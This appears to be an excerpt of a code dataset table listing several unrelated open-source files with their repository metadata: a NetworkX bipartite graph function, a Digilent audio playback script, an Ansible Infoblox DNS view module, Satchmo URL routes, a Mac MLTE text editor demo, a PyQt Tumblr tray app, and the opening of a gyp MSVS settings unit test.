repo_name stringlengths 5 100 | path stringlengths 4 294 | copies stringclasses 990
values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15
values |
|---|---|---|---|---|---|
debsankha/networkx | networkx/algorithms/bipartite/redundancy.py | 45 | 3946 | # -*- coding: utf-8 -*-
"""Node redundancy for bipartite graphs."""
# Copyright (C) 2011 by
# Jordi Torrents <jtorrents@milnou.net>
# Aric Hagberg <hagberg@lanl.gov>
# All rights reserved.
# BSD license.
from __future__ import division
from itertools import combinations
from networkx import NetworkXError
__author__ = """\n""".join(['Jordi Torrents <jtorrents@milnou.net>',
'Aric Hagberg (hagberg@lanl.gov)'])
__all__ = ['node_redundancy']
def node_redundancy(G, nodes=None):
r"""Computes the node redundancy coefficients for the nodes in the bipartite
graph ``G``.
The redundancy coefficient of a node `v` is the fraction of pairs of
neighbors of `v` that are both linked to other nodes. In a one-mode
projection these nodes would be linked together even if `v` were
not there.
More formally, for any vertex `v`, the *redundancy coefficient of `v`* is
defined by
.. math::
rc(v) = \frac{|\{\{u, w\} \subseteq N(v),
\: \exists v' \neq v,\: (v',u) \in E\:
\mathrm{and}\: (v',w) \in E\}|}{ \frac{|N(v)|(|N(v)|-1)}{2}},
where `N(v)` is the set of neighbors of `v` in ``G``.
Parameters
----------
G : graph
A bipartite graph
nodes : list or iterable (optional)
Compute redundancy for these nodes. The default is all nodes in G.
Returns
-------
redundancy : dictionary
A dictionary keyed by node with the node redundancy value.
Examples
--------
Compute the redundancy coefficient of each node in a graph::
>>> import networkx as nx
>>> from networkx.algorithms import bipartite
>>> G = nx.cycle_graph(4)
>>> rc = bipartite.node_redundancy(G)
>>> rc[0]
1.0
Compute the average redundancy for the graph::
>>> import networkx as nx
>>> from networkx.algorithms import bipartite
>>> G = nx.cycle_graph(4)
>>> rc = bipartite.node_redundancy(G)
>>> sum(rc.values()) / len(G)
1.0
Compute the average redundancy for a set of nodes::
>>> import networkx as nx
>>> from networkx.algorithms import bipartite
>>> G = nx.cycle_graph(4)
>>> rc = bipartite.node_redundancy(G)
>>> nodes = [0, 2]
>>> sum(rc[n] for n in nodes) / len(nodes)
1.0
Raises
------
NetworkXError
If any of the nodes in the graph (or in ``nodes``, if specified) has
(out-)degree less than two (which would result in division by zero,
according to the definition of the redundancy coefficient).
References
----------
.. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).
Basic notions for the analysis of large two-mode networks.
Social Networks 30(1), 31--48.
"""
if nodes is None:
nodes = G
if any(len(G[v]) < 2 for v in nodes):
raise NetworkXError('Cannot compute redundancy coefficient for a node'
' that has fewer than two neighbors.')
# TODO This can be trivially parallelized.
return {v: _node_redundancy(G, v) for v in nodes}
def _node_redundancy(G, v):
"""Returns the redundancy of the node ``v`` in the bipartite graph ``G``.
If ``G`` is a graph with ``n`` nodes, the redundancy of a node is the ratio
of the "overlap" of ``v`` to the maximum possible overlap of ``v``
according to its degree. The overlap of ``v`` is the number of pairs of
neighbors that have mutual neighbors themselves, other than ``v``.
``v`` must have at least two neighbors in ``G``.
"""
n = len(G[v])
# TODO On Python 3, we could just use `G[u].keys() & G[w].keys()` instead
# of instantiating the entire sets.
overlap = sum(1 for (u, w) in combinations(G[v], 2)
if (set(G[u]) & set(G[w])) - {v})
return (2 * overlap) / (n * (n - 1))
| bsd-3-clause |
andrasfuchs/BioBalanceDetector | Measurements/WaveForms/Experiments/SleepLogging/python/AnalogOut_Play.py | 1 | 3587 | """
DWF Python Example
Author: Digilent, Inc.
Revision: 2018-07-19
Requires:
Python 2.7, 3
"""
import numpy as np
import scipy.io.wavfile
import matplotlib.pyplot as plt
import ctypes
from ctypes import *
import sys
print("Load audio.WAV file")
rate, data = scipy.io.wavfile.read('audio.wav')
print("Rate: "+str(rate))
print("Size: "+str(data.size))
print("Type: " +str(np.dtype(data[0])))
# AnalogOut expects double normalized to +/-1 value
dataf = data.astype(np.float64)
if np.dtype(data[0]) == np.int8 or np.dtype(data[0]) == np.uint8 :
print("Scaling: UINT8")
dataf /= 128.0
dataf -= 1.0
elif np.dtype(data[0]) == np.int16 :
print("Scaling: INT16")
dataf /= 32768.0
elif np.dtype(data[0]) == np.int32 :
print("Scaling: INT32")
dataf /= 2147483648.0
data_c = (ctypes.c_double * len(dataf))(*dataf)
plt.plot(data)
plt.show()
if sys.platform.startswith("win"):
dwf = cdll.dwf
elif sys.platform.startswith("darwin"):
dwf = cdll.LoadLibrary("/Library/Frameworks/dwf.framework/dwf")
else:
dwf = cdll.LoadLibrary("libdwf.so")
# declare ctype variables
hdwf = c_int()
channel = c_int(0) # AWG 1
# print(DWF version
version = create_string_buffer(16)
dwf.FDwfGetVersion(version)
print("DWF Version: "+str(version.value))
# open device
print("Opening first device...")
dwf.FDwfDeviceOpen(c_int(-1), byref(hdwf))
if hdwf.value == 0:
print("Failed to open device")
szerr = create_string_buffer(512)
dwf.FDwfGetLastErrorMsg(szerr)
print(str(szerr.value))
quit()
print("Playing audio...")
iPlay = 0
dwf.FDwfAnalogOutNodeEnableSet(hdwf, channel, 0, c_bool(True))
dwf.FDwfAnalogOutNodeFunctionSet(hdwf, channel, 0, c_int(31)) #funcPlay
dwf.FDwfAnalogOutRepeatSet(hdwf, channel, c_int(1))
sRun = 1.0*data.size/rate
print("Length: "+str(sRun))
dwf.FDwfAnalogOutRunSet(hdwf, channel, c_double(sRun))
dwf.FDwfAnalogOutNodeFrequencySet(hdwf, channel, 0, c_double(rate))
dwf.FDwfAnalogOutNodeAmplitudeSet(hdwf, channel, 0, c_double(1.0))
# prime the buffer with the first chunk of data
cBuffer = c_int(0)
dwf.FDwfAnalogOutNodeDataInfo(hdwf, channel, 0, 0, byref(cBuffer))
if cBuffer.value > data.size : cBuffer.value = data.size
dwf.FDwfAnalogOutNodeDataSet(hdwf, channel, 0, data_c, cBuffer)
iPlay += cBuffer.value
dwf.FDwfAnalogOutConfigure(hdwf, channel, c_bool(True))
dataLost = c_int(0)
dataFree = c_int(0)
dataCorrupted = c_int(0)
sts = c_ubyte(0)
totalLost = 0
totalCorrupted = 0
while True :
# fetch analog in info for the channel
if dwf.FDwfAnalogOutStatus(hdwf, channel, byref(sts)) != 1:
print("Error")
szerr = create_string_buffer(512)
dwf.FDwfGetLastErrorMsg(szerr)
print(szerr.value)
break
if sts.value != 3: break # not running !DwfStateRunning
if iPlay >= data.size : continue # no more data to stream
dwf.FDwfAnalogOutNodePlayStatus(hdwf, channel, 0, byref(dataFree), byref(dataLost), byref(dataCorrupted))
totalLost += dataLost.value
totalCorrupted += dataCorrupted.value
if iPlay + dataFree.value > data.size : # last chunk might be less than the free buffer size
dataFree.value = data.size - iPlay
if dataFree.value == 0 : continue
if dwf.FDwfAnalogOutNodePlayData(hdwf, channel, 0, byref(data_c, iPlay*8), dataFree) != 1: # offset for double is *8 (bytes)
print("Error")
break
iPlay += dataFree.value
print("Lost: "+str(totalLost))
print("Corrupted: "+str(totalCorrupted))
print("done")
dwf.FDwfAnalogOutReset(hdwf, channel)
dwf.FDwfDeviceClose(hdwf) | gpl-3.0 |
trishnaguha/ansible | lib/ansible/modules/net_tools/nios/nios_dns_view.py | 68 | 4192 | #!/usr/bin/python
# Copyright (c) 2018 Red Hat, Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = '''
---
module: nios_dns_view
version_added: "2.5"
author: "Peter Sprygada (@privateip)"
short_description: Configure Infoblox NIOS DNS views
description:
- Adds and/or removes instances of DNS view objects from
Infoblox NIOS servers. This module manages NIOS C(view) objects
using the Infoblox WAPI interface over REST.
- Updates instances of DNS view object from Infoblox NIOS servers.
requirements:
- infoblox-client
extends_documentation_fragment: nios
options:
name:
description:
- Specifies the fully qualified hostname to add or remove from
the system. User can also update the hostname as it is possible
to pass a dict containing I(new_name), I(old_name). See examples.
required: true
aliases:
- view
network_view:
description:
- Specifies the name of the network view to assign the configured
DNS view to. The network view must already be configured on the
target system.
required: true
default: default
extattrs:
description:
- Allows for the configuration of Extensible Attributes on the
instance of the object. This argument accepts a set of key / value
pairs for configuration.
required: false
comment:
description:
- Configures a text string comment to be associated with the instance
of this object. The provided text string will be configured on the
object instance.
required: false
state:
description:
- Configures the intended state of the instance of the object on
the NIOS server. When this value is set to C(present), the object
is configured on the device and when this value is set to C(absent)
the value is removed (if necessary) from the device.
required: false
default: present
choices:
- present
- absent
'''
EXAMPLES = '''
- name: configure a new dns view instance
nios_dns_view:
name: ansible-dns
state: present
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
- name: update the comment for dns view
nios_dns_view:
name: ansible-dns
comment: this is an example comment
state: present
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
- name: remove the dns view instance
nios_dns_view:
name: ansible-dns
state: absent
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
- name: update the dns view instance
nios_dns_view:
name: {new_name: ansible-dns-new, old_name: ansible-dns}
state: present
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
'''
RETURN = ''' # '''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.net_tools.nios.api import WapiModule
from ansible.module_utils.net_tools.nios.api import NIOS_DNS_VIEW
def main():
''' Main entry point for module execution
'''
ib_spec = dict(
name=dict(required=True, aliases=['view'], ib_req=True),
network_view=dict(default='default', ib_req=True),
extattrs=dict(type='dict'),
comment=dict()
)
argument_spec = dict(
provider=dict(required=True),
state=dict(default='present', choices=['present', 'absent'])
)
argument_spec.update(ib_spec)
argument_spec.update(WapiModule.provider_spec)
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True)
wapi = WapiModule(module)
result = wapi.run(NIOS_DNS_VIEW, ib_spec)
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 |
dokterbob/satchmo | satchmo/apps/satchmo_ext/newsletter/urls.py | 3 | 1161 | """
URLConf for Satchmo Newsletter app
This will get automatically added by satchmo_store, under the url given in your livesettings "NEWSLETTER","NEWSLETTER_SLUG"
"""
from django.conf.urls.defaults import *
from livesettings import config_value
import logging
log = logging.getLogger('newsletter.urls')
urlpatterns = patterns('satchmo_ext.newsletter.views',
(r'^subscribe/$', 'add_subscription', {}, 'newsletter_subscribe'),
(r'^subscribe/ajah/$', 'add_subscription',
{'result_template' : 'newsletter/ajah.html'}, 'newsletter_subscribe_ajah'),
(r'^unsubscribe/$', 'remove_subscription',
{}, 'newsletter_unsubscribe'),
(r'^unsubscribe/ajah/$', 'remove_subscription',
{'result_template' : 'newsletter/ajah.html'}, 'newsletter_unsubscribe_ajah'),
(r'^update/$', 'update_subscription', {}, 'newsletter_update'),
)
newsbase = r'^' + config_value('NEWSLETTER','NEWSLETTER_SLUG') + '/'
newspatterns = patterns('',
(newsbase, include('satchmo_ext.newsletter.urls'))
)
def add_newsletter_urls(sender, patterns=(), **kwargs):
log.debug("Adding newsletter urls at %s", newsbase)
patterns += newspatterns
| bsd-3-clause |
fighterCui/L4ReFiascoOC | l4/pkg/python/contrib/Mac/Demo/mlte/mlted.py | 39 | 11096 | # A minimal text editor using MLTE. Based on wed.py.
#
# To be done:
# - Functionality: find, etc.
from Menu import DrawMenuBar
from FrameWork import *
from Carbon import Win
from Carbon import Ctl
from Carbon import Qd
from Carbon import Res
from Carbon import Scrap
import os
from Carbon import MacTextEditor
from Carbon import Mlte
UNDOLABELS = [ # Indexed by MLTECanUndo() value
"Typing", "Cut", "Paste", "Clear", "Font Change", "Color Change", "Size Change",
"Style Change", "Align Left", "Align Center", "Align Right", "Drop", "Move"]
class MlteWindow(Window):
def open(self, path, name, data):
self.path = path
self.name = name
r = windowbounds(400, 400)
w = Win.NewWindow(r, name, 1, 0, -1, 1, 0)
self.wid = w
flags = MacTextEditor.kTXNDrawGrowIconMask|MacTextEditor.kTXNWantHScrollBarMask| \
MacTextEditor.kTXNWantVScrollBarMask
self.ted, self.frameid = Mlte.TXNNewObject(None, w, None, flags, MacTextEditor.kTXNTextEditStyleFrameType,
MacTextEditor.kTXNTextFile, MacTextEditor.kTXNMacOSEncoding)
self.ted.TXNSetData(MacTextEditor.kTXNTextData, data, 0, 0x7fffffff)
self.changed = 0
self.do_postopen()
self.do_activate(1, None)
def do_idle(self, event):
self.ted.TXNIdle()
self.ted.TXNAdjustCursor(None)
def do_activate(self, onoff, evt):
if onoff:
## self.ted.TXNActivate(self.frameid, 0)
self.ted.TXNFocus(1)
self.parent.active = self
else:
self.ted.TXNFocus(0)
self.parent.active = None
self.parent.updatemenubar()
def do_update(self, wid, event):
self.ted.TXNDraw(None)
def do_postresize(self, width, height, window):
self.ted.TXNResizeFrame(width, height, self.frameid)
def do_contentclick(self, local, modifiers, evt):
self.ted.TXNClick(evt)
self.parent.updatemenubar()
def do_char(self, ch, event):
self.ted.TXNKeyDown(event)
self.parent.updatemenubar()
def close(self):
if self.changed:
save = EasyDialogs.AskYesNoCancel('Save window "%s" before closing?'%self.name, 1)
if save > 0:
self.menu_save()
elif save < 0:
return
if self.parent.active == self:
self.parent.active = None
self.ted.TXNDeleteObject()
del self.ted
## del self.tedtexthandle
self.do_postclose()
def menu_save(self):
if not self.path:
self.menu_save_as()
return # Will call us recursively
dhandle = self.ted.TXNGetData(0, 0x7fffffff)
data = dhandle.data
fp = open(self.path, 'wb') # NOTE: wb, because data has CR for end-of-line
fp.write(data)
if data[-1] <> '\r': fp.write('\r')
fp.close()
self.changed = 0
def menu_save_as(self):
path = EasyDialogs.AskFileForSave(message='Save as:')
if not path: return
self.path = path
self.name = os.path.split(self.path)[-1]
self.wid.SetWTitle(self.name)
self.menu_save()
def menu_cut(self):
## self.ted.WESelView()
self.ted.TXNCut()
### Mlte.ConvertToPublicScrap()
## Scrap.ZeroScrap()
## self.ted.WECut()
## self.updatescrollbars()
self.parent.updatemenubar()
self.changed = 1
def menu_copy(self):
## Scrap.ZeroScrap()
self.ted.TXNCopy()
### Mlte.ConvertToPublicScrap()
## self.updatescrollbars()
self.parent.updatemenubar()
def menu_paste(self):
### Mlte.ConvertFromPublicScrap()
self.ted.TXNPaste()
## self.updatescrollbars()
self.parent.updatemenubar()
self.changed = 1
def menu_clear(self):
## self.ted.WESelView()
self.ted.TXNClear()
## self.updatescrollbars()
self.parent.updatemenubar()
self.changed = 1
def menu_undo(self):
self.ted.TXNUndo()
## self.updatescrollbars()
self.parent.updatemenubar()
def menu_redo(self):
self.ted.TXNRedo()
## self.updatescrollbars()
self.parent.updatemenubar()
def have_selection(self):
start, stop = self.ted.TXNGetSelection()
return start < stop
def can_paste(self):
return Mlte.TXNIsScrapPastable()
def can_undo(self):
can, which = self.ted.TXNCanUndo()
if not can:
return None
if which >= len(UNDOLABELS):
# Unspecified undo
return "Undo"
which = UNDOLABELS[which]
return "Undo "+which
def can_redo(self):
can, which = self.ted.TXNCanRedo()
if not can:
return None
if which >= len(UNDOLABELS):
# Unspecified undo
return "Redo"
which = UNDOLABELS[which]
return "Redo "+which
class Mlted(Application):
def __init__(self):
Application.__init__(self)
self.num = 0
self.active = None
self.updatemenubar()
def makeusermenus(self):
self.filemenu = m = Menu(self.menubar, "File")
self.newitem = MenuItem(m, "New window", "N", self.open)
self.openitem = MenuItem(m, "Open...", "O", self.openfile)
self.closeitem = MenuItem(m, "Close", "W", self.closewin)
m.addseparator()
self.saveitem = MenuItem(m, "Save", "S", self.save)
self.saveasitem = MenuItem(m, "Save as...", "", self.saveas)
m.addseparator()
self.quititem = MenuItem(m, "Quit", "Q", self.quit)
self.editmenu = m = Menu(self.menubar, "Edit")
self.undoitem = MenuItem(m, "Undo", "Z", self.undo)
self.redoitem = MenuItem(m, "Redo", None, self.redo)
m.addseparator()
self.cutitem = MenuItem(m, "Cut", "X", self.cut)
self.copyitem = MenuItem(m, "Copy", "C", self.copy)
self.pasteitem = MenuItem(m, "Paste", "V", self.paste)
self.clearitem = MenuItem(m, "Clear", "", self.clear)
# Groups of items enabled together:
self.windowgroup = [self.closeitem, self.saveitem, self.saveasitem, self.editmenu]
self.focusgroup = [self.cutitem, self.copyitem, self.clearitem]
self.windowgroup_on = -1
self.focusgroup_on = -1
self.pastegroup_on = -1
self.undo_label = "never"
self.redo_label = "never"
def updatemenubar(self):
changed = 0
on = (self.active <> None)
if on <> self.windowgroup_on:
for m in self.windowgroup:
m.enable(on)
self.windowgroup_on = on
changed = 1
if on:
# only if we have an edit menu
on = self.active.have_selection()
if on <> self.focusgroup_on:
for m in self.focusgroup:
m.enable(on)
self.focusgroup_on = on
changed = 1
on = self.active.can_paste()
if on <> self.pastegroup_on:
self.pasteitem.enable(on)
self.pastegroup_on = on
changed = 1
on = self.active.can_undo()
if on <> self.undo_label:
if on:
self.undoitem.enable(1)
self.undoitem.settext(on)
self.undo_label = on
else:
self.undoitem.settext("Nothing to undo")
self.undoitem.enable(0)
changed = 1
on = self.active.can_redo()
if on <> self.redo_label:
if on:
self.redoitem.enable(1)
self.redoitem.settext(on)
self.redo_label = on
else:
self.redoitem.settext("Nothing to redo")
self.redoitem.enable(0)
changed = 1
if changed:
DrawMenuBar()
#
# Apple menu
#
def do_about(self, id, item, window, event):
EasyDialogs.Message("A simple single-font text editor based on MacTextEditor")
#
# File menu
#
def open(self, *args):
self._open(0)
def openfile(self, *args):
self._open(1)
def _open(self, askfile):
if askfile:
path = EasyDialogs.AskFileForOpen(typeList=('TEXT',))
if not path:
return
name = os.path.split(path)[-1]
try:
fp = open(path, 'rb') # NOTE binary, we need cr as end-of-line
data = fp.read()
fp.close()
except IOError, arg:
EasyDialogs.Message("IOERROR: %r" % (arg,))
return
else:
path = None
name = "Untitled %d"%self.num
data = ''
w = MlteWindow(self)
w.open(path, name, data)
self.num = self.num + 1
def closewin(self, *args):
if self.active:
self.active.close()
else:
EasyDialogs.Message("No active window?")
def save(self, *args):
if self.active:
self.active.menu_save()
else:
EasyDialogs.Message("No active window?")
def saveas(self, *args):
if self.active:
self.active.menu_save_as()
else:
EasyDialogs.Message("No active window?")
def quit(self, *args):
for w in self._windows.values():
w.close()
if self._windows:
return
self._quit()
#
# Edit menu
#
def undo(self, *args):
if self.active:
self.active.menu_undo()
else:
EasyDialogs.Message("No active window?")
def redo(self, *args):
if self.active:
self.active.menu_redo()
else:
EasyDialogs.Message("No active window?")
def cut(self, *args):
if self.active:
self.active.menu_cut()
else:
EasyDialogs.Message("No active window?")
def copy(self, *args):
if self.active:
self.active.menu_copy()
else:
EasyDialogs.Message("No active window?")
def paste(self, *args):
if self.active:
self.active.menu_paste()
else:
EasyDialogs.Message("No active window?")
def clear(self, *args):
if self.active:
self.active.menu_clear()
else:
EasyDialogs.Message("No active window?")
#
# Other stuff
#
def idle(self, event):
if self.active:
self.active.do_idle(event)
else:
Qd.SetCursor(Qd.GetQDGlobalsArrow())
def main():
Mlte.TXNInitTextension(0)
try:
App = Mlted()
App.mainloop()
finally:
Mlte.TXNTerminateTextension()
if __name__ == '__main__':
main()
| gpl-2.0 |
ialex/opentumblr-qt | opentumblrqt/gui/TumblrTray.py | 1 | 3961 | from PyQt4 import QtCore,QtGui
try:
from opentumblrqt.dashboard import Dashboard
from opentumblrqt.text import Text
from opentumblrqt.photo import Photo
from opentumblrqt.quote import Quote
from opentumblrqt.link import Link
from opentumblrqt.chat import Chat
from opentumblrqt.audio import Audio
from opentumblrqt.video import Video
except ImportError:
from ..opentumblrqt.dashboard import Dashboard
from text import Text
from photo import Photo
from quote import Quote
from link import Link
from chat import Chat
from audio import Audio
from video import Video
class TumblrTray(QtGui.QSystemTrayIcon):
def __init__(self,parent=None):
super(TumblrTray, self).__init__(parent)
self.setupUi(parent)
#Dashboard instance
self.dashboard = Dashboard(parent)
self.p = parent
#Connecting events
self.connect(self.tray,QtCore.SIGNAL('activated(QSystemTrayIcon::ActivationReason)'),self.OnClick)
self.connect(self.Text,QtCore.SIGNAL('triggered()'),self.OnText)
self.connect(self.Photo, QtCore.SIGNAL('triggered()'), self.OnPhoto)
self.connect(self.Quote, QtCore.SIGNAL('triggered()'), self.OnQuote)
self.connect(self.Url, QtCore.SIGNAL('triggered()'), self.OnUrl)
self.connect(self.Chat, QtCore.SIGNAL('triggered()'), self.OnChat)
self.connect(self.Audio, QtCore.SIGNAL('triggered()'), self.OnAudio)
self.connect(self.Video, QtCore.SIGNAL('triggered()'), self.OnVideo)
self.connect(self.Exit, QtCore.SIGNAL('triggered()'), self.OnLogout)
def setupUi(self,parent):
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("/usr/share/pixmaps/opentumblr-qt/dashboard/opentumblr_icon.jpg"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.tray = QtGui.QSystemTrayIcon(parent)
self.tray.setIcon(icon)
self.tray.show()
#Creating the context menu
self.Traymenu = QtGui.QMenu(parent)
self.Text = QtGui.QAction("&Text",parent)
self.Photo = QtGui.QAction("&Photo",parent)
self.Quote = QtGui.QAction("&Quote",parent)
self.Url = QtGui.QAction("&Url",parent)
self.Chat = QtGui.QAction("&Chat",parent)
self.Audio = QtGui.QAction("&Audio",parent)
self.Video = QtGui.QAction("&Video",parent)
self.Exit = QtGui.QAction("&Exit",parent)
self.Traymenu.addAction(self.Text)
self.Traymenu.addAction(self.Photo)
self.Traymenu.addAction(self.Quote)
self.Traymenu.addAction(self.Url)
self.Traymenu.addAction(self.Chat)
self.Traymenu.addAction(self.Audio)
self.Traymenu.addAction(self.Video)
self.Traymenu.addAction(self.Exit)
self.setContextMenu(self.Traymenu)
def OnClick(self,reason):
#Dashboard
if reason == QtGui.QSystemTrayIcon.DoubleClick:
if self.dashboard.isVisible():
self.dashboard.hide()
else:
self.dashboard.show()
#Direct posting options (showing context menu)
if reason == QtGui.QSystemTrayIcon.Context:
self.contextMenu().popup(QtGui.QCursor.pos())
def OnText(self):
text = Text(self.parent())
text.show()
def OnPhoto(self):
photo = Photo(self.parent())
photo.show()
def OnQuote(self):
quote = Quote(self.parent())
quote.show()
def OnUrl(self):
link = Link(self.parent())
link.show()
def OnChat(self):
chat = Chat(self.parent())
chat.show()
def OnAudio(self):
audio = Audio(None,self.parent().api)
audio.show()
def OnVideo(self):
video = Video(self.parent())
video.show()
def OnLogout(self):
self.parent().close()
| mit |
standback/standback.github.io | node_modules/gulp-sass/node_modules/node-sass/node_modules/node-gyp/gyp/pylib/gyp/MSVSSettings_test.py | 1446 | 65937 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unit tests for the MSVSSettings.py file."""
import StringIO
import unittest
import gyp.MSVSSettings as MSVSSettings
class TestSequenceFunctions(unittest.TestCase):
def setUp(self):
self.stderr = StringIO.StringIO()
def _ExpectedWarnings(self, expected):
"""Compares recorded lines to expected warnings."""
self.stderr.seek(0)
actual = self.stderr.read().split('\n')
actual = [line for line in actual if line]
self.assertEqual(sorted(expected), sorted(actual))
def testValidateMSVSSettings_tool_names(self):
"""Tests that only MSVS tool names are allowed."""
MSVSSettings.ValidateMSVSSettings(
{'VCCLCompilerTool': {},
'VCLinkerTool': {},
'VCMIDLTool': {},
'foo': {},
'VCResourceCompilerTool': {},
'VCLibrarianTool': {},
'VCManifestTool': {},
'ClCompile': {}},
self.stderr)
self._ExpectedWarnings([
'Warning: unrecognized tool foo',
'Warning: unrecognized tool ClCompile'])
def testValidateMSVSSettings_settings(self):
"""Tests that for invalid MSVS settings."""
MSVSSettings.ValidateMSVSSettings(
{'VCCLCompilerTool': {
'AdditionalIncludeDirectories': 'folder1;folder2',
'AdditionalOptions': ['string1', 'string2'],
'AdditionalUsingDirectories': 'folder1;folder2',
'AssemblerListingLocation': 'a_file_name',
'AssemblerOutput': '0',
'BasicRuntimeChecks': '5',
'BrowseInformation': 'fdkslj',
'BrowseInformationFile': 'a_file_name',
'BufferSecurityCheck': 'true',
'CallingConvention': '-1',
'CompileAs': '1',
'DebugInformationFormat': '2',
'DefaultCharIsUnsigned': 'true',
'Detect64BitPortabilityProblems': 'true',
'DisableLanguageExtensions': 'true',
'DisableSpecificWarnings': 'string1;string2',
'EnableEnhancedInstructionSet': '1',
'EnableFiberSafeOptimizations': 'true',
'EnableFunctionLevelLinking': 'true',
'EnableIntrinsicFunctions': 'true',
'EnablePREfast': 'true',
'Enableprefast': 'bogus',
'ErrorReporting': '1',
'ExceptionHandling': '1',
'ExpandAttributedSource': 'true',
'FavorSizeOrSpeed': '1',
'FloatingPointExceptions': 'true',
'FloatingPointModel': '1',
'ForceConformanceInForLoopScope': 'true',
'ForcedIncludeFiles': 'file1;file2',
'ForcedUsingFiles': 'file1;file2',
'GeneratePreprocessedFile': '1',
'GenerateXMLDocumentationFiles': 'true',
'IgnoreStandardIncludePath': 'true',
'InlineFunctionExpansion': '1',
'KeepComments': 'true',
'MinimalRebuild': 'true',
'ObjectFile': 'a_file_name',
'OmitDefaultLibName': 'true',
'OmitFramePointers': 'true',
'OpenMP': 'true',
'Optimization': '1',
'PrecompiledHeaderFile': 'a_file_name',
'PrecompiledHeaderThrough': 'a_file_name',
'PreprocessorDefinitions': 'string1;string2',
'ProgramDataBaseFileName': 'a_file_name',
'RuntimeLibrary': '1',
'RuntimeTypeInfo': 'true',
'ShowIncludes': 'true',
'SmallerTypeCheck': 'true',
'StringPooling': 'true',
'StructMemberAlignment': '1',
'SuppressStartupBanner': 'true',
'TreatWChar_tAsBuiltInType': 'true',
'UndefineAllPreprocessorDefinitions': 'true',
'UndefinePreprocessorDefinitions': 'string1;string2',
'UseFullPaths': 'true',
'UsePrecompiledHeader': '1',
'UseUnicodeResponseFiles': 'true',
'WarnAsError': 'true',
'WarningLevel': '1',
'WholeProgramOptimization': 'true',
'XMLDocumentationFileName': 'a_file_name',
'ZZXYZ': 'bogus'},
'VCLinkerTool': {
'AdditionalDependencies': 'file1;file2',
'AdditionalDependencies_excluded': 'file3',
'AdditionalLibraryDirectories': 'folder1;folder2',
'AdditionalManifestDependencies': 'file1;file2',
'AdditionalOptions': 'a string1',
'AddModuleNamesToAssembly': 'file1;file2',
'AllowIsolation': 'true',
'AssemblyDebug': '2',
'AssemblyLinkResource': 'file1;file2',
'BaseAddress': 'a string1',
'CLRImageType': '2',
'CLRThreadAttribute': '2',
'CLRUnmanagedCodeCheck': 'true',
'DataExecutionPrevention': '2',
'DelayLoadDLLs': 'file1;file2',
'DelaySign': 'true',
'Driver': '2',
'EmbedManagedResourceFile': 'file1;file2',
'EnableCOMDATFolding': '2',
'EnableUAC': 'true',
'EntryPointSymbol': 'a string1',
'ErrorReporting': '2',
'FixedBaseAddress': '2',
'ForceSymbolReferences': 'file1;file2',
'FunctionOrder': 'a_file_name',
'GenerateDebugInformation': 'true',
'GenerateManifest': 'true',
'GenerateMapFile': 'true',
'HeapCommitSize': 'a string1',
'HeapReserveSize': 'a string1',
'IgnoreAllDefaultLibraries': 'true',
'IgnoreDefaultLibraryNames': 'file1;file2',
'IgnoreEmbeddedIDL': 'true',
'IgnoreImportLibrary': 'true',
'ImportLibrary': 'a_file_name',
'KeyContainer': 'a_file_name',
'KeyFile': 'a_file_name',
'LargeAddressAware': '2',
'LinkIncremental': '2',
'LinkLibraryDependencies': 'true',
'LinkTimeCodeGeneration': '2',
'ManifestFile': 'a_file_name',
'MapExports': 'true',
'MapFileName': 'a_file_name',
'MergedIDLBaseFileName': 'a_file_name',
'MergeSections': 'a string1',
'MidlCommandFile': 'a_file_name',
'ModuleDefinitionFile': 'a_file_name',
'OptimizeForWindows98': '1',
'OptimizeReferences': '2',
'OutputFile': 'a_file_name',
'PerUserRedirection': 'true',
'Profile': 'true',
'ProfileGuidedDatabase': 'a_file_name',
'ProgramDatabaseFile': 'a_file_name',
'RandomizedBaseAddress': '2',
'RegisterOutput': 'true',
'ResourceOnlyDLL': 'true',
'SetChecksum': 'true',
'ShowProgress': '2',
'StackCommitSize': 'a string1',
'StackReserveSize': 'a string1',
'StripPrivateSymbols': 'a_file_name',
'SubSystem': '2',
'SupportUnloadOfDelayLoadedDLL': 'true',
'SuppressStartupBanner': 'true',
'SwapRunFromCD': 'true',
'SwapRunFromNet': 'true',
'TargetMachine': '2',
'TerminalServerAware': '2',
'TurnOffAssemblyGeneration': 'true',
'TypeLibraryFile': 'a_file_name',
'TypeLibraryResourceID': '33',
'UACExecutionLevel': '2',
'UACUIAccess': 'true',
'UseLibraryDependencyInputs': 'true',
'UseUnicodeResponseFiles': 'true',
'Version': 'a string1'},
'VCMIDLTool': {
'AdditionalIncludeDirectories': 'folder1;folder2',
'AdditionalOptions': 'a string1',
'CPreprocessOptions': 'a string1',
'DefaultCharType': '1',
'DLLDataFileName': 'a_file_name',
'EnableErrorChecks': '1',
'ErrorCheckAllocations': 'true',
'ErrorCheckBounds': 'true',
'ErrorCheckEnumRange': 'true',
'ErrorCheckRefPointers': 'true',
'ErrorCheckStubData': 'true',
'GenerateStublessProxies': 'true',
'GenerateTypeLibrary': 'true',
'HeaderFileName': 'a_file_name',
'IgnoreStandardIncludePath': 'true',
'InterfaceIdentifierFileName': 'a_file_name',
'MkTypLibCompatible': 'true',
'notgood': 'bogus',
'OutputDirectory': 'a string1',
'PreprocessorDefinitions': 'string1;string2',
'ProxyFileName': 'a_file_name',
'RedirectOutputAndErrors': 'a_file_name',
'StructMemberAlignment': '1',
'SuppressStartupBanner': 'true',
'TargetEnvironment': '1',
'TypeLibraryName': 'a_file_name',
'UndefinePreprocessorDefinitions': 'string1;string2',
'ValidateParameters': 'true',
'WarnAsError': 'true',
'WarningLevel': '1'},
'VCResourceCompilerTool': {
